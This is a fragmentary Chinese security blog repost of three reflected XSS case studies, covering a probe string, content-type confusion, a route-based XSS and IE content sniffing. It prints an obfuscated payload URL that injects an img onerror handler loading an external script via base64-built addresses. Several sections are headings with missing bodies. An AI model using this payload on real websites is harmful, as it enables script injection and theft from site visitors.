https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922
什么是反射xss?
如何检测反射xss?
'"/><s>ssssssss
poc使用方法
https://www.b.com/a?p1=1&p2=2
https://www.b.com/a?p1=1poc&p2=2https://www.b.com/a?p1=1&p2=2poc
案例一∶真假难辨的content-type
案例二∶不可思议的路由型反射xss
http://example.com/mobile/down/example%22%3E%3Cimg%20src%3D1%20onerror%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%22s%3Ddocument.createElement%28%27script%27%29%3Bbody.appendChild%28s%29%3Bvar%20a%3D%27Lw%3D%3D%27%3Bs.src%3D%27http%3A%27%2bwindow.atob%28a%29%2bwindow.atob%28a%29%2b%27u3v.cn.example.com%27%2bwindow.atob%28a%29%2b%275hfHgf%27%3B%22%3E...................
案例三∶浏览器的神秘解析
这个案例源自于一个小师傅的提问,某天小师傅给我发消息,为什么他上传了html文件,只能在IE浏览器中可以执行弹窗代码,在别的浏览器却不可以。
浏览器内容嗅探机制,工作原理可以简单理解为,当服务器响应头中没有指定content-type时,浏览器会根据源码内容或者是请求的资源后缀,作为文件类型进行解析,其中IE浏览器的嗅探机制最为简单粗暴,流程如下:
1.根据响应头conten-type判断文件类型;
2.无法匹配到合适的content-type,按照请求路径中的后缀解析,比如:
以上就是我要分享的三个小案例,原理性的内容并不多,主要是想和大家分享下挖掘思路。漏洞千奇百怪,无所不有!
结语
来都来了,点个赞?
原文始发于微信公众号(进击的HACK):[案例分享]我和反射Xss的奇闻趣事
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论